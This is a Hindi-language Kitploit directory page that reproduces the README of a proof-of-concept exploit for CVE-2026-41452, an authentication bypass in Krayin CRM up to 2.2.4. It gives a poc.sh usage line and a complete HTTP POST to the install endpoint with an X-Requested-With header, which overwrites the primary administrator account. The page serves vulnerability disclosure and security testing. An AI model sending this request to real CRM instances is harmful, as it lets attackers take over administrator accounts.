Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-41452-poc — CVE-2026-41452 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Krayin CRM <= 2.2.4 में एक गंभीर ऑथेंटिकेशन बायपास है, जो मिडलवेयर बायपास के माध्यम से अनऑथेंटिकेटेड एडमिन अकाउंट टेकओवर की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/o-sec/cve-2026-41452-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubo-sec/cve-2026-41452-poc

CVE-2026-41452-poc

CVE-2026-41452 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Krayin CRM <= 2.2.4 में एक गंभीर ऑथेंटिकेशन बायपास है, जो मिडलवेयर बायपास के माध्यम से अनऑथेंटिकेटेड एडमिन अकाउंट टेकओवर की अनुमति देता है।

रिपॉजिटरी देखें
13घं 59मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-41452: मिडलवेयर बायपास के माध्यम से Krayin CRM एडमिन अकाउंट टेकओवर

CVSS v3.1: 9.8 Critical Target: Krayin CRM <= 2.2.4 License: MIT

एक Proof of Concept (PoC) जो Krayin CRM संस्करण 2.2.4 और उससे पहले के संस्करणों को प्रभावित करने वाली एक गंभीर अनुपस्थित प्रमाणीकरण (missing authentication) कमजोरी (CVE-2026-41452) को प्रदर्शित करता है।

यह दोष अनधिकृत रिमोट हमलावरों को विशिष्ट HTTP हेडर इंजेक्ट करके एप्लिकेशन के इंस्टॉलेशन मिडलवेयर लॉजिक (CanInstall) को बायपास करने की अनुमति देता है, जिससे प्राथमिक एडमिनिस्ट्रेटर अकाउंट कॉन्फ़िगरेशन पूरी तरह से ओवरराइट हो जाता है।

[!WARNING]
अस्वीकरण: यह रिपॉज़िटरी और इसमें निहित जानकारी पूर्णतः शैक्षिक उद्देश्यों, सुरक्षा अनुसंधान और अधिकृत रक्षात्मक ऑडिटिंग के लिए प्रदान की गई है। कंप्यूटर सिस्टम का अनधिकृत परीक्षण या शोषण पूर्णतः अवैध है। लेखक इस सामग्री के किसी भी दुरुपयोग के लिए कोई दायित्व स्वीकार नहीं करता।


कमजोरी का अवलोकन

  • CVE ID: CVE-2026-41452

कमजोरी का प्रकार: अनुपस्थित प्रमाणीकरण / मिडलवेयर बायपास

  • गंभीरता: गंभीर (CVSS 9.8)

  • प्रभावित सॉफ़्टवेयर: Krayin CRM <= 2.2.4

  • पैच किया गया संस्करण: Krayin CRM >= 2.2.5

  • तकनीकी विवरण

    यह कमजोरी एप्लिकेशन के सेटअप मिडलवेयर में निहित है। एक अनधिकृत हमलावर /install/api/admin-config-setup एंडपॉइंट को लक्षित करते हुए एक तैयार किए गए पेलोड में X-Requested-With: XMLHttpRequest हेडर जोड़ सकता है। यह CanInstall मिडलवेयर के भीतर अपेक्षित रीडायरेक्शन जाँच को दबा देता है, जिससे एक अनधिकृत updateOrInsert डेटाबेस ऑपरेशन उजागर हो जाता है जो प्राथमिक सिस्टम एडमिनिस्ट्रेटर की हार्डकोडेड ID (1) को लक्षित करता है।


    Proof of Concept (PoC)

    उपयोग

    स्क्रिप्ट को उस लक्ष्य इंस्टेंस के विरुद्ध चलाएँ जिसका परीक्षण करने के लिए आप अधिकृत हैं:

    root@kitploit:~
    ./poc.sh <TARGET-URL> <USERNAME> <EMAIL> <PASSWORD>
    

    HTTP अनुरोध उदाहरण

    आंतरिक रूप से, बायपास निम्नलिखित HTTP ट्रांज़ैक्शन संरचना के माध्यम से ट्रिगर होता है:

    root@kitploit:~
    POST /install/api/admin-config-setup HTTP/1.1
    Host: target-crm.local
    X-Requested-With: XMLHttpRequest
    Content-Type: application/x-www-form-urlencoded
    
    name=test1&[email protected]&password=Password123
    

    संदर्भ

    • nist cve-2026-41452 detail
    टूल डाउनलोड करें